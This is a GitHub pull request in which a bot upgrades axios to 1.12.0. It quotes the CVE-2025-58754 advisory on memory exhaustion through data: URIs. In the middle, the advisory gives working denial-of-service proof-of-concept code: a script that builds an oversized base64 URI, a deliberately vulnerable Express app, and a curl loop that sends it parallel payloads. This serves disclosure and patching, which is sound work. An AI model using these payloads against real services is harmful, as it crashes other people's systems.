Skip to content

Conversation

@openverse-bot
Copy link
Collaborator

This PR contains the following updates:

Package Type Update Change
axios (source) dependencies minor 1.8.2 -> 1.12.0

GitHub Vulnerability Alerts

CVE-2025-58754

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size, the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://redirect.github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs which axios fully ignore maxContentLength , maxBodyLength and decodes into memory on Node before streaming enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @&#8203;payload.json -o /dev/null```

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.


Release Notes

axios/axios (axios)

v1.12.0

Compare Source

Bug Fixes
Features
  • adapter: surface low‑level network error details; attach original error via cause (#​6982) (78b290c)
  • fetch: add fetch, Request, Response env config variables for the adapter; (#​7003) (c959ff2)
  • support reviver on JSON.parse (#​5926) (2a97634), closes #​5924
  • types: extend AxiosResponse interface to include custom headers type (#​6782) (7960d34)
Contributors to this release

v1.11.0

Compare Source

Bug Fixes
Contributors to this release

v1.10.0

Compare Source

Bug Fixes
  • adapter: pass fetchOptions to fetch function (#​6883) (0f50af8)
  • form-data: convert boolean values to strings in FormData serialization (#​6917) (5064b10)
  • package: add module entry point for React Native; (#​6933) (3d343b8)
Features
Contributors to this release

v1.9.0

Compare Source

Bug Fixes
  • core: fix the Axios constructor implementation to treat the config argument as optional; (#​6881) (6c5d4cd)
  • fetch: fixed ERR_NETWORK mapping for Safari browsers; (#​6767) (dfe8411)
  • headers: allow iterable objects to be a data source for the set method; (#​6873) (1b1f9cc)
  • headers: fix getSetCookie by using 'get' method for caseless access; (#​6874) (d4f7df4)
  • headers: fixed support for setting multiple header values from an iterated source; (#​6885) (f7a3b5e)
  • http: send minimal end multipart boundary (#​6661) (987d2e2)
  • types: fix autocomplete for adapter config (#​6855) (e61a893)
Features
  • AxiosHeaders: add getSetCookie method to retrieve set-cookie headers values (#​5707) (80ea756)
Contributors to this release

1.8.4 (2025-03-19)

Bug Fixes
  • buildFullPath: handle allowAbsoluteUrls: false without baseURL (#​6833) (f10c2e0)
Contributors to this release

1.8.3 (2025-03-10)

Bug Fixes
  • add missing type for allowAbsoluteUrls (#​6818) (10fa70e)
  • xhr/fetch: pass allowAbsoluteUrls to buildFullPath in xhr and fetch adapters (#​6814) (ec159e5)
Contributors to this release

1.8.2 (2025-03-07)

Bug Fixes
  • http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)
Contributors to this release

1.8.1 (2025-02-26)

Bug Fixes
  • utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)
Contributors to this release

v1.8.4

Compare Source

Bug Fixes
  • buildFullPath: handle allowAbsoluteUrls: false without baseURL (#​6833) (f10c2e0)
Contributors to this release

v1.8.3

Compare Source

Bug Fixes
  • add missing type for allowAbsoluteUrls (#​6818) (10fa70e)
  • xhr/fetch: pass allowAbsoluteUrls to buildFullPath in xhr and fetch adapters (#​6814) (ec159e5)
Contributors to this release

Configuration

📅 Schedule: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled because a matching PR was automerged previously.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Renovate Bot.

@openverse-bot openverse-bot requested a review from a team as a code owner November 23, 2025 14:37
@openverse-bot openverse-bot added dependencies Pull requests that update a dependency file 💻 aspect: code Concerns the software code in the repository 🟨 tech: javascript Involves JavaScript 🟩 priority: low Low priority and doesn't need to be rushed 🧰 goal: internal improvement Improvement that benefits maintainers, not users 🧱 stack: frontend Related to the Nuxt frontend labels Nov 23, 2025
@openverse-bot openverse-bot moved this to 👀 Needs Review in Openverse PRs Nov 23, 2025
@github-actions
Copy link

Latest k6 run output1

     ✓ status was 200

     checks.........................: 100.00% ✓ 416      ✗ 0   
     data_received..................: 98 MB   408 kB/s
     data_sent......................: 54 kB   226 B/s
     http_req_blocked...............: avg=53.98µs  min=2.58µs   med=5.12µs   max=1.31ms   p(90)=157.07µs p(95)=288.32µs
     http_req_connecting............: avg=41.53µs  min=0s       med=0s       max=1.24ms   p(90)=111.54µs p(95)=246.87µs
     http_req_duration..............: avg=161.48ms min=19.09ms  med=100.73ms max=939.73ms p(90)=372.4ms  p(95)=482.43ms
       { expected_response:true }...: avg=161.48ms min=19.09ms  med=100.73ms max=939.73ms p(90)=372.4ms  p(95)=482.43ms
   ✓ http_req_failed................: 0.00%   ✓ 0        ✗ 416 
     http_req_receiving.............: avg=176.32µs min=47.25µs  med=146.81µs max=834.26µs p(90)=281.6µs  p(95)=369.26µs
     http_req_sending...............: avg=31.46µs  min=8.38µs   med=24.01µs  max=178.89µs p(90)=51.24µs  p(95)=100.96µs
     http_req_tls_handshaking.......: avg=0s       min=0s       med=0s       max=0s       p(90)=0s       p(95)=0s      
     http_req_waiting...............: avg=161.27ms min=18.94ms  med=100.5ms  max=939.43ms p(90)=372.04ms p(95)=482.15ms
     http_reqs......................: 416     1.725311/s
     iteration_duration.............: avg=867.97ms min=419.68ms med=879.21ms max=1.82s    p(90)=1.15s    p(95)=1.22s   
     iterations.....................: 78      0.323496/s
     vus............................: 4       min=0      max=6 
     vus_max........................: 60      min=60     max=60

Footnotes

  1. This comment will automatically update with new output each time k6 runs for this PR

@dhruvkb dhruvkb merged commit d662828 into main Nov 23, 2025
81 checks passed
@dhruvkb dhruvkb deleted the gha-renovatenpm-axios-vulnerability branch November 23, 2025 20:00
@github-project-automation github-project-automation bot moved this from 👀 Needs Review to 🤝 Merged in Openverse PRs Nov 23, 2025
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

💻 aspect: code Concerns the software code in the repository dependencies Pull requests that update a dependency file 🧰 goal: internal improvement Improvement that benefits maintainers, not users 🟩 priority: low Low priority and doesn't need to be rushed 🧱 stack: frontend Related to the Nuxt frontend 🟨 tech: javascript Involves JavaScript

Projects

Archived in project

Development

Successfully merging this pull request may close these issues.

3 participants